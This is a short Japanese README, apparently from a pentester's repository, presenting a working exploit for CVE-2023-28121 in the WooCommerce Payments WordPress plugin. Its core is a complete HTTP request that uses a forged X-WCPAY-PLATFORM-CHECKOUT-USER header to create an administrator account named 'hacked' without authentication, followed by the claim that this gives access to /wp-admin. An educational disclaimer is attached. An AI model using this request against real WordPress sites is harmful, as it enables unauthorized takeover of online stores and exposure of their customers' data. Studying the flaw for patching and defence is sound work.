
WooCommerce Payments プラグインを使用した WordPress の重大な脆弱性の実践的悪用
WooCommerce Payments プラグインを使用した WordPress の重大な脆弱性の実践的な悪用。
CVE-2023-28121 は、REST API を介して認証なしで管理者ユーザーを作成することを可能にします。
📊 影響を受けるプラグインは数十万のインストールがあり、Eコマースで広く使用されています。
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
このシステムは改変可能なヘッダーを受け入れます:
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
これにより、有効な認証なしで昇格された特権を持つユーザーを作成するためのリクエストを送信することが可能になります。
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ 結果: 管理者ユーザーの作成
/wp-admin パネルへのアクセス👨💻 著者
Luis Eduardo .M.B.S.R
Pentester / Web Security
LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/
GitHub: https://github.com/luisdevpentest
管理された環境での教育目的の使用を目的としています。この知識が第三者によってどのように使用されるかについては一切責任を負いません。